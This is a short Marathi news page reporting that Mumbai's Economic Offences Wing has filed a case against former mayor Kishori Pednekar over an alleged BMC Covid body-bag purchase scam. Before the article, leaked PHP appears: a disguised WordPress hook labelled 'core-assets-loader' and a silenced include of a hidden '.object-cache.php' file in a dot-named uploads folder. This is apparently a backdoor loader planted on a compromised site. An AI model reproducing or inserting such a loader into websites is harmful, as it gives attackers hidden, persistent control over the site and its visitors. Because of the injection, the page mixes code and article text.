add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मोठी बातमी! कोविड घोटाळ्याप्रकरणी किशोरी पेडणेकरांवर गुन्हा दाखल – SOCH INDIA
Menu

देश
मोठी बातमी! कोविड घोटाळ्याप्रकरणी किशोरी पेडणेकरांवर गुन्हा दाखल

nobanner

मुंबई महानगरपालिकेच्या (BMC) कथित कोविड घोटाळ्याप्रकरणी (Covid Scam) मुंबईच्या माजी महापौर किशोरी पेडणेकर (Kishori Pednekar) यांच्यावर गुन्हा दाखल करण्यात आला आहे. आर्थिक गुन्हे शाखेने किशोरी पेडणेकर यांच्या विरोधात गुन्हा दाखल केला असल्याची माहिती समोर आली आहे. बॉडी बॅग खरेदीत घोटाळा केल्याचा आरोप किशोरी पेडणेकर यांच्यावर आहे.